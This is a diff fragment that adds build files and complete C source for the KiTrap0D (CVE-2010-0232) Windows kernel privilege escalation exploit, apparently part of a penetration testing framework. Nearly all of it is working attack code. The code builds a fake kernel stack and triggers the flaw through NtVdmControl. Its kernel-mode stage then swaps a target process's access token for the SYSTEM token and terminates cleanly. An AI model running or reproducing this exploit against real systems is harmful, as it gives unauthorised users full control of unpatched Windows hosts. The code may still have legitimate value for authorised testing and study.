+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
+      <IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\kitrap0d.map</MapFileName>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>
+      </DataExecutionPrevention>
+      <ImportLibrary>$(OutDir)\kitrap0d.lib</ImportLibrary>
+      <TargetMachine>MachineX86</TargetMachine>
+      <Profile>false</Profile>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2010-0232\" GOTO COPY
+    mkdir "..\..\..\..\..\data\exploits\CVE-2010-0232\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2010-0232\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
+    <ClCompile Include="..\common\ResourceLoader.c" />
+    <ClCompile Include="kitrap0d.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h" />
+    <ClInclude Include="..\common\common.h" />
+    <ClInclude Include="..\common\ResourceLoader.h" />
+    <ClInclude Include="resource.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="kitrap0d.rc" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <ClCompile Include="kitrap0d.c" />
+    <ClCompile Include="..\common\ResourceLoader.c">
+      <Filter>common</Filter>
+    </ClCompile>
+    <ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
+      <Filter>RDI</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="resource.h" />
+    <ClInclude Include="..\common\common.h">
+      <Filter>common</Filter>
+    </ClInclude>
+    <ClInclude Include="..\common\ResourceLoader.h">
+      <Filter>common</Filter>
+    </ClInclude>
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h">
+      <Filter>RDI</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="kitrap0d.rc" />
+  </ItemGroup>
+  <ItemGroup>
+    <Filter Include="common">
+      <UniqueIdentifier>{cbb362dd-4029-4348-86d3-62c4b22c742d}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="RDI">
+      <UniqueIdentifier>{662e77af-b8cd-4717-a3f2-87b2ec57f46c}</UniqueIdentifier>
+    </Filter>
+  </ItemGroup>
+</Project>
@@ -0,0 +1,368 @@
+/*!
+ * @file kitrap0d.c
+ * @brief A port of HDM's/Pusscat's implementation of Tavis Ormandy's code (vdmallowed.c).
+ * @remark See http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
+ */
+
+#ifndef WIN32_NO_STATUS
+# define WIN32_NO_STATUS
+#endif
+#include <windows.h>
+#include <stdio.h>
+#include "../common/common.h"
+#include "kitrap0d.h"
+#include <winerror.h>
+#include <winternl.h>
+#include <stddef.h>
+#ifdef WIN32_NO_STATUS
+# undef WIN32_NO_STATUS
+#endif
+#include <ntstatus.h>
+
+#ifdef _WIN64
+
+/*
+ * This is not implemented for the x64 build.
+ */
+VOID elevator_kitrap0d( DWORD dwProcessId, DWORD dwKernelBase, DWORD dwOffset )
+{
+	return;
+}
+
+#else
+
+/*! * @brief Global target process ID. */
+static DWORD dwTargetProcessId      = 0;
+/*! * @brief Global pointer to the kernel stack. */
+static DWORD * lpKernelStackPointer = NULL;
+/*! * @brief Global reference to the kernel itself. */
+static HMODULE hKernel              = NULL;
+
+/*!
+ * @brief Find an exported kernel symbol by name.
+ * @param SymbolName The name of the symbol to find.
+ * @returns Pointer to the symbol, if found.
+ */
+PVOID elevator_kitrap0d_kernelgetproc(PSTR SymbolName)
+{
+	PUCHAR ImageBase = NULL;
+	PULONG NameTable = NULL;
+	PULONG FunctionTable = NULL;
+	PUSHORT OrdinalTable = NULL;
+	PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
+	PIMAGE_DOS_HEADER DosHeader = NULL;
+	PIMAGE_NT_HEADERS PeHeader = NULL;
+	DWORD i = 0;
+
+	ImageBase = (PUCHAR)hKernel;
+	DosHeader = (PIMAGE_DOS_HEADER)ImageBase;
+	PeHeader = (PIMAGE_NT_HEADERS)(ImageBase + DosHeader->e_lfanew);
+	ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(ImageBase + PeHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
+
+	// Find required tables from the ExportDirectory...
+	NameTable = (PULONG)(ImageBase + ExportDirectory->AddressOfNames);
+	FunctionTable = (PULONG)(ImageBase + ExportDirectory->AddressOfFunctions);
+	OrdinalTable = (PUSHORT)(ImageBase + ExportDirectory->AddressOfNameOrdinals);
+
+	// Scan each entry for a matching name.
+	for (i = 0; i < ExportDirectory->NumberOfNames; i++)
+	{
+		PCHAR Symbol = ImageBase + NameTable[i];
+
+		if (strcmp(Symbol, SymbolName) == 0)
+		{
+			// Symbol found, return the appropriate entry from FunctionTable.
+			return (PVOID)(ImageBase + FunctionTable[OrdinalTable[i]]);
+		}
+	}
+
+	// Symbol not found, this is likely fatal :-(
+	return NULL;
+}
+
+/*!
+ * @brief Replace a value if it falls between a given range.
+ */
+BOOL elevator_kitrap0d_checkandreplace(PDWORD checkMe, DWORD rangeStart, DWORD rangeEnd, DWORD value)
+{
+	if (*checkMe >= rangeStart && *checkMe <= rangeEnd)
+	{
+		*checkMe = value;
+		return TRUE;
+	}
+
+	return FALSE;
+}
+
+/*!
+ * @brief Search the specified data structure for a member with CurrentValue.
+ */
+BOOL elevator_kitrap0d_findandreplace( PDWORD Structure, DWORD CurrentValue, DWORD NewValue, DWORD MaxSize, BOOL ObjectRefs)
+{
+	DWORD i    = 0;
+	DWORD Mask = 0;
+
+	// Microsoft QWORD aligns object pointers, then uses the lower three
+	// bits for quick reference counting (nice trick).
+	Mask = ObjectRefs ? ~7 : ~0;
+
+	// Mask out the reference count.
+	CurrentValue &= Mask;
+
+	// Scan the structure for any occurrence of CurrentValue.
+	for( i = 0 ; i < MaxSize ; i++ )
+	{
+		if( (Structure[i] & Mask) == CurrentValue )
+		{
+			// And finally, replace it with NewValue.
+			Structure[i] = NewValue;
+			return TRUE;
+		}
+	}
+
+	// Member not found.
+	return FALSE;
+}
+
+/*!
+ * @brief This routine is where we land after successfully triggering the vulnerability.
+ */
+#pragma warning(disable: 4731)
+VOID elevator_kitrap0d_firststage(VOID)
+{
+	FARPROC DbgPrint = NULL;
+	FARPROC PsGetCurrentThread = NULL;
+	FARPROC PsGetCurrentThreadStackBase = NULL;
+	FARPROC PsGetCurrentThreadStackLimit = NULL;
+	FARPROC PsLookupProcessByProcessId = NULL;
+	FARPROC PsReferencePrimaryToken = NULL;
+	FARPROC ZwTerminateProcess = NULL;
+	PVOID CurrentThread = NULL;
+	PVOID TargetProcess = NULL;
+	PVOID * PsInitialSystemProcess = NULL;
+	HANDLE pret = NULL;
+	DWORD StackBase = 0;
+	DWORD StackLimit = 0;
+	DWORD NewStack = 0;
+	DWORD i = 0;
+	DWORD dwEThreadOffsets[] = {
+		0x6, // WinXP SP3, VistaSP2
+		0xA	 // Windows 7, VistaSP1
+	};
+
+	// Keep interrupts off until we've repaired the KTHREAD.
+	__asm cli
+
+	// Resolve some routines we need from the kernel export directory
+	DbgPrint = elevator_kitrap0d_kernelgetproc("DbgPrint");
+	PsGetCurrentThread = elevator_kitrap0d_kernelgetproc("PsGetCurrentThread");
+	PsGetCurrentThreadStackBase = elevator_kitrap0d_kernelgetproc("PsGetCurrentThreadStackBase");
+	PsGetCurrentThreadStackLimit = elevator_kitrap0d_kernelgetproc("PsGetCurrentThreadStackLimit");
+	PsInitialSystemProcess = elevator_kitrap0d_kernelgetproc("PsInitialSystemProcess");
+	PsLookupProcessByProcessId = elevator_kitrap0d_kernelgetproc("PsLookupProcessByProcessId");
+	PsReferencePrimaryToken = elevator_kitrap0d_kernelgetproc("PsReferencePrimaryToken");
+	ZwTerminateProcess = elevator_kitrap0d_kernelgetproc("ZwTerminateProcess");
+
+	CurrentThread = (PVOID)PsGetCurrentThread();
+	StackLimit = (DWORD)PsGetCurrentThreadStackLimit();
+	StackBase = (DWORD)PsGetCurrentThreadStackBase();
+
+	NewStack = StackBase - ((StackBase - StackLimit) / 2);
+
+	// First we need to repair the CurrentThread, find all references to the fake kernel
+	// stack and repair them. Note that by "repair" we mean randomly point them
+	// somewhere inside the real stack.
+
+	// Walk only the offsets that could possibly be bad based on testing, and see if they need
+	// to be swapped out.  O(n^2) -> O(c) wins the race!
+	for (i = 0; i < sizeof(dwEThreadOffsets) / sizeof (DWORD); i++) {
+		elevator_kitrap0d_checkandreplace((((PDWORD)CurrentThread) + dwEThreadOffsets[i]), (DWORD)&lpKernelStackPointer[0], (DWORD)&lpKernelStackPointer[KSTACKSIZE - 1], (DWORD)NewStack);
+	}
+
+	// Find the EPROCESS structure for the process we want to escalate
+	if (PsLookupProcessByProcessId(dwTargetProcessId, &TargetProcess) == STATUS_SUCCESS)
+	{
+		PACCESS_TOKEN SystemToken = NULL;
+		PACCESS_TOKEN TargetToken = NULL;
+
+		// What's the maximum size the EPROCESS structure is ever likely to be?
+		CONST DWORD MaxExpectedEprocessSize = 0x200;
+
+		// DbgPrint("PsLookupProcessByProcessId(%u) => %p\n", TargetPid, TargetProcess);
+		//DbgPrint("PsInitialSystemProcess @%p\n", *PsInitialSystemProcess);
+
+		// Find the Token object for my target process, and the SYSTEM process.
+		TargetToken = (PACCESS_TOKEN)PsReferencePrimaryToken(TargetProcess);
+
+		SystemToken = (PACCESS_TOKEN)PsReferencePrimaryToken(*PsInitialSystemProcess);
+
+		//DbgPrint("PsReferencePrimaryToken(%p) => %p\n", TargetProcess, TargetToken);
+		//DbgPrint("PsReferencePrimaryToken(%p) => %p\n", *PsInitialSystemProcess, SystemToken);
+
+		// Find the token in the target process, and replace with the system token.
+		elevator_kitrap0d_findandreplace((PDWORD)TargetProcess, (DWORD)TargetToken, (DWORD)SystemToken, MaxExpectedEprocessSize, TRUE);
+
+		// Success
+		pret = (HANDLE)'w00t';
+	}
+	else
+	{
+		// Maybe the user closed the window?
+		// Report this failure
+		pret = (HANDLE)'LPID';
+	}
+
+	__asm
+	{
+		mov eax, -1   // ZwCurrentProcess macro returns -1
+		mov ebx, NewStack
+		mov ecx, pret
+		mov edi, ZwTerminateProcess
+		mov esp, ebx  // Swap the stack back to kernel-land
+		mov ebp, ebx  // Swap the frame pointer back to kernel-land
+		sub esp, 256
+		push ecx      // Push the return code
+		push eax      // Push the process handle
+		sti           // Restore interrupts finally
+		call edi      // Call ZwTerminateProcess
+		__emit 0xCC;  // Hope we never end up here
+	};
+
+}
+#pragma warning(default: 4731)
+
+/*!
+ * @brief Setup a minimal execution environment to satisfy NtVdmControl().
+ */
+BOOL elevator_kitrap0d_initvdmsubsystem(VOID)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	FARPROC pNtAllocateVirtualMemory = NULL;
+	FARPROC pNtFreeVirtualMemory = NULL;
+	FARPROC pNtVdmControl = NULL;
+	PBYTE BaseAddress = (PVOID)0x00000001;
+	HMODULE hNtdll = NULL;
+	ULONG RegionSize = 0;
+	static DWORD TrapHandler[128] = { 0 };
+	static DWORD IcaUserData[128] = { 0 };
+
+	static struct {
+		PVOID TrapHandler;
+		PVOID IcaUserData;
+	} InitData;
+
+	do
+	{
+		hNtdll = GetModuleHandle("ntdll");
+		if (!hNtdll) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevator_kitrap0d_initvdmsubsystem. GetModuleHandle ntdll failed", ERROR_INVALID_PARAMETER);
+		}
+
+		pNtAllocateVirtualMemory = GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
+		pNtFreeVirtualMemory = GetProcAddress(hNtdll, "NtFreeVirtualMemory");
+		pNtVdmControl = GetProcAddress(hNtdll, "NtVdmControl");
+
+		if (!pNtAllocateVirtualMemory || !pNtFreeVirtualMemory || !pNtVdmControl) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevator_kitrap0d_initvdmsubsystem. invalid params", ERROR_INVALID_PARAMETER);
+		}
+
+		InitData.TrapHandler = TrapHandler;
+		InitData.IcaUserData = IcaUserData;
+
+		// Remove anything currently mapped at NULL
+		pNtFreeVirtualMemory(GetCurrentProcess(), &BaseAddress, &RegionSize, MEM_RELEASE);
+
+		BaseAddress = (PVOID)0x00000001;
+		RegionSize = (ULONG)0x00100000;
+
+		// Allocate the 1MB virtual 8086 address space.
+		if (pNtAllocateVirtualMemory(GetCurrentProcess(), &BaseAddress, 0, &RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevator_kitrap0d_initvdmsubsystem. NtAllocateVirtualMemory failed", 'NTAV');
+		}
+
+		// Finalise the initialisation.
+		if (pNtVdmControl(VdmInitialize, &InitData) != STATUS_SUCCESS) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevator_kitrap0d_initvdmsubsystem. NtVdmControl failed", 'VDMC');
+		}
+
+		return TRUE;
+
+	} while (0);
+
+	ExitThread(dwResult);
+
+	return FALSE;
+}
+
+/*!
+ * @brief CVE-2010-0232 implementation.
+ */
+VOID elevator_kitrap0d(DWORD dwProcessId, DWORD dwKernelBase, DWORD dwOffset)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	FARPROC pNtVdmControl = NULL;
+	HMODULE hNtdll = NULL;
+	DWORD dwKernelStack[KSTACKSIZE] = { 0 };
+	VDMTIB VdmTib = { 0 };
+	DWORD dwMinimumExpectedVdmTibSize = 0x200;
+	DWORD dwMaximumExpectedVdmTibSize = 0x800;
+
+	do
+	{
+		dprintf("[KITRAP0D] elevator_kitrap0d. dwProcessId=%d, dwKernelBase=0x%08X, dwOffset=0x%08X", dwProcessId, dwKernelBase, dwOffset);
+
+		memset(&VdmTib, 0, sizeof(VDMTIB));
+		memset(&dwKernelStack, 0, KSTACKSIZE * sizeof(DWORD));
+
+		// XXX: Windows 2000 forces the thread to exit with 0x80 if Padding3 is filled with junk.
+		//      With a buffer full of NULLs, the exploit never finds the right size.
+		//      This will require a more work to resolve, for just keep the padding zero'd
+
+		hNtdll = GetModuleHandle("ntdll");
+		if (!hNtdll) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevator_kitrap0d. GetModuleHandle ntdll failed", ERROR_INVALID_PARAMETER);
+		}
+
+		pNtVdmControl = GetProcAddress(hNtdll, "NtVdmControl");
+		if (!pNtVdmControl) {
+			BREAK_ON_ERROR("[KITRAP0D] elevator_kitrap0d. GetProcAddress NtVdmControl failed");
+		}
+
+		dwTargetProcessId = dwProcessId;
+
+		// Setup the fake kernel stack, and install a minimal VDM_TIB...
+		lpKernelStackPointer = (DWORD *)&dwKernelStack;
+		dwKernelStack[0] = (DWORD)&dwKernelStack[8];            // ESP
+		dwKernelStack[1] = (DWORD)NtCurrentTeb();               // TEB
+		dwKernelStack[2] = (DWORD)NtCurrentTeb();               // TEB
+		dwKernelStack[7] = (DWORD)elevator_kitrap0d_firststage; // RETURN ADDRESS
+		hKernel = (HMODULE)dwKernelBase;
+		VdmTib.Size = dwMinimumExpectedVdmTibSize;
+		*NtCurrentTeb()->Reserved4 = &VdmTib;
+
+		// Initialize the VDM Subsystem...
+		elevator_kitrap0d_initvdmsubsystem();
+
+		VdmTib.Size = dwMinimumExpectedVdmTibSize;
+		VdmTib.VdmContext.SegCs = 0x0B;
+		VdmTib.VdmContext.Esi = (DWORD)&dwKernelStack;
+		VdmTib.VdmContext.Eip = dwKernelBase + dwOffset;
+		VdmTib.VdmContext.EFlags = EFLAGS_TF_MASK;
+		*NtCurrentTeb()->Reserved4 = &VdmTib;
+
+		// Allow thread initialization to complete. Without is, there is a chance
+		// of a race in KiThreadInitialize's call to SwapContext
+		Sleep(1000);
+
+		// Trigger the vulnerable code via NtVdmControl()...
+		while (VdmTib.Size++ < dwMaximumExpectedVdmTibSize) {
+			pNtVdmControl(VdmStartExecution, NULL);
+		}
+
+	} while (0);
+
+	// Unable to find correct VdmTib size.
+	ExitThread('VTIB');
+}
+
+#endif
--- a/Show More
+++ b/Show More